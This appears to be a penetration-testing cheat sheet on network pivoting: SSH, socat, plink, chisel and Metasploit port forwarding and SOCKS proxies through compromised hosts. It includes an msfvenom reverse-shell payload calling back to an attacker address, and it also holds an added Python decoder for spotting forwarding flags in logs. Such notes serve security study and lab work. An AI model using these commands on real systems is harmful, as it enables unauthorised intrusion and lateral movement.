# Pivoting

```
Local port forwarding
Forward local port to remote host
ssh <gateway> -L <local port to listen>:<remote host>:<remote port>

Remote port forwarding
Forward remote port to local host
ssh <gateway> -R <remote port to bind>:<local host>:<local port>

Dynamic port
ssh -D <local proxy port> -p <remote port> <target>
```
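How the three flags above decompose, as an added example that is not part of the original page: a small decoder that takes an `ssh` or `plink` command line (for instance from a process-creation log) and reports which end opens the listener and where the traffic is delivered. The function names, result fields and sample command lines are constructed for illustration.

```python
import shlex

# Side that opens the listening socket for each forwarding flag (OpenSSH and plink).
LISTENER = {"-L": "client", "-R": "server", "-D": "client"}

def describe(flag, spec):
    """Decode one forward spec: [bind:]port[:host:hostport]. IPv6 literals are not handled."""
    parts = spec.split(":")
    if flag == "-D" or len(parts) <= 2:
        # -D, or -R with a bare port: the listener is a SOCKS proxy, destination set per connection
        bind, port = parts if len(parts) == 2 else ("", parts[0])
        dest = "socks"
    else:
        parts = [""] * (4 - len(parts)) + parts   # no bind address given
        bind, port, host, hostport = parts
        dest = f"{host}:{hostport}"
    return {
        "flag": flag,
        "listener": LISTENER[flag],          # where the new listening port appears
        "bind": bind or "default",
        "port": int(port),
        "dest": dest,
        # the destination is dialled from the opposite end of the SSH connection
        "reached_from": "client" if LISTENER[flag] == "server" else "server",
        "all_interfaces": bind in ("0.0.0.0", "*"),
    }

def parse_forwards(cmdline):
    """Return every -L/-R/-D forward found in an ssh or plink command line."""
    args = shlex.split(cmdline)
    found, i = [], 1
    while i < len(args):
        flag, attached = args[i][:2], args[i][2:]
        if flag in LISTENER:
            if not attached and i + 1 < len(args):   # "-D 1080" form
                i += 1
                attached = args[i]
            if attached:
                found.append(describe(flag, attached))
        i += 1
    return found

# Constructed command lines, as they might appear in process-creation logs.
SAMPLES = [
    "ssh -R 8081:172.24.0.2:80 user@gateway.example",
    "plink.exe 192.0.2.10 -P 22 -C -N -L 0.0.0.0:4445:192.0.2.10:4443 -l user",
    "ssh -D1080 -p 22 user@gateway.example",
]
if __name__ == "__main__":
    for line in SAMPLES:
        print(line, parse_forwards(line))
```

Combined short options and `-o LocalForward=...` style settings are outside what this decoder covers.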

SOCAT

```
socat file:`tty`,raw,echo=0 tcp-listen:8989
```

PORT FORWARDING "port to port":

\----MSF---- Most platforms

Forward: get a meterpreter session on one of the dual-homed machines, then:

```
portfwd add -l 4445 -p 4443 -r ip
```

Use -R to make it reverse.

\----SSH---- For Linux

\~C "if you already have an SSH session"

-R 8081:ip:80 (on my Kali machine listen on 8081, get it from 172.24.0.2:80)

:8081<------------:80 Now you can access 172.24.0.2:80, which you didn't have direct access to

-L 8083:ip:8084 (on your machine listen on 8083, send it to my Kali machine on 8084)

:8084<------------:8083<------------:XXXX run nc on port 8084, and if ip:8083 receives a reverse shell, you will get it

For reverse shell:

```
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.1.1.230 LPORT=8083 -f exe -o shell
```

Run it on the 2nd remote target to get a shell on Kali.

Or, if you didn't have an SSH session, SSH to your Kali from the target machine.

On Kali:

```
service ssh start
```

"add a user, give it /bin/false in /etc/passwd"

```
ssh - -R 12345:192.168.122.228:5986 test@10.1.1.1
```

\---PLINK---- Just like SSH, on Windows

Run `service ssh start`, and transfer `/usr/share/windows-binaries/plink.exe` to the target machine.

On Target:

```
plink.exe ip -P 22 -C -N -L 0.0.0.0:4445:ip:4443 -l KALIUSER -pw PASS
```

\---SOCAT---- For linux

Forward your 8083 to ip:443:

```
./socat TCP4-LISTEN:8083,fork TCP4:ip:443
```

\---CHISEL---- Most platforms

Remote static tunnels "port to port":

On Kali "reverse proxy listener":

```
./chisel server -p 8000 -reverse
```

General command: ./chisel client : L/R:\[YOUR LOCAL IP]:::

Remote tunnels "access IP:PORT you couldn't access before". On Target:

```
./chisel client ip:8000 R:127.0.0.1:8001:172.19.0.3:80
```

Local tunnels "listen on the target for something, and send it to us". On Target:

```
./chisel client 10.1.1.1:8000 9001:127.0.0.1:8003
```

DYNAMIC "port to any":

Set up proxychains with socks5 on 127.0.0.1:1080, or set up a socks5 proxy in Firefox. For nmap use -Pn -sT, or use the TCP scanner in msf.

\----MSF---- Most platforms

Get a meterpreter session on one of the dual-homed machines, auto route to ip (multi/manage/autoroute), then start a socks proxy (auxiliary/server/socks4a).

\----SSH---- For Linux

-D1080

\---PLINK--- Just like SSH, on Windows

On Target:

```
plink.exe ip -P 22 -C -N -D 1080 -l KALIUSER -pw PASS
```

\---CHISEL---- Most platforms

On Kali:

```
./chisel server -p 8000 -reverse
```

On Target:

```
./chisel client ip:8000 R:8001:127.0.0.1:1080
./chisel server -p 8001 --socks5
```

On Kali:

```
./chisel client 127.0.0.1:8001 socks
```

